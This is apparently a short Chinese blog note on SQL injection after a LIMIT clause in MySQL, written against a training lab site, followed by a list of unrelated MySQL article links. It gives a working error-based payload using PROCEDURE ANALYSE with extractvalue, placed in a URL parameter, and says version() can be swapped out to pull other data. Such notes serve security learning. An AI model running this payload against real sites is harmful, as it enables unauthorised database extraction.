mysql limit后的注入
2015-12-04 16:30
579 查看
mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1);
例子:http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=0&num=1
procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)%23
然后这么玩:
http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=0 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)%23&num=1
替换:version() 可以得到更多数据
相关文章推荐
- Mysql几种索引类型的区别及适用情况(转载)
- MySQL内存使用-线程独享
- MySQL 计算每周第一天、每月第一天的方法
- 获取mysqli函数的值和字段名
- 解决cmake编译Mysql 5.6报错CMP0022
- MySQL (ZIP Archive) 下载及安装及卸载
- mysql 锁总结
- Mysql 命令操作笔记
- 如何查看MySQL配置文件的读取顺序。
- 处理".mysql_history"小技巧。
- 忘记MySQL root密码如何重置。
- mysql 计划任务 调用存储过程
- configure: error: MySQL library not found ,Not found mysqlclient library
- 有结果集的mysqli函数获取行数和列数
- 启动mysql时显示:/tmp/mysql.sock 不存在的解决方法
- 找不到mysql.sock,mysql.sock丢失问题解决方法
- MySQL DISTINCT 的基本实现原理
- MySQL存储引擎MyISAM与InnoDB的区别
- MySQL数据类型注意事项
- 获取自动增长IDmysqli函数